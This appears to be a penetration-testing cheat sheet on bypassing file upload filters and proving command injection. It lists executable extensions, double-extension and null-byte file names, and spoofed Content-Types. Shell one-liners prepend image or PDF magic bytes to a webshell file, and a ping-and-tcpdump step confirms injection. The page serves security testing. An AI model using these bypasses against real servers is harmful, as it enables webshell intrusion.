User Endpoints

File Upload Filtering

Executable extensions

.php -> Standard extension for PHP scripts.

.php5 -> Used for PHP version 5 scripts.

.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.

.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.

.phps -> Typically used for PHP source code highlighting.

.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.

.asp -> Active Server Pages, Microsoft’s server-side scripting technology.

.aspx -> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.

.jsp -> Java Server Pages, used for dynamic web applications in Java environments.

Test filters

  • There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:

  • File extension :

    • Double extensions:

      • .png.php, .jpg.php, .png.asp, .gif.jsp

    • Null byte injection:

      • file.php%00.jpg, file.asp%00.png

  • Content-Type headers:

    • Executable types:

      • application/x-php

      • application/x-sh

      • application/x-msdownload

      • application/x-python-code

    • Image Types:

      • image/png,image/jpeg, image/gif, image/bmp, image/svg+xml

    • MIME Confusion:

      • text/html instead of application/json

      • text/plain to trick servers.

  • Magic bytes (file signature)

PNG
echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png
JPEG
echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg
GIF
echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif
PDF
echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf
ZIP
echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip
Check Input Sanitation/Validation
  • Submit especial characters in the request -> !@$%^&

  • In Linux IP addresses can be written in decimal and HEX, this can be useful if dots are blacklisted.

Prove the Injection

  • If you find a command injection, test whether the system can establish outbound connections to an external server:

ping+10.10.10.10
  • And wait for it with tcpdump:

tcpdump -i tun0 icmp

Last updated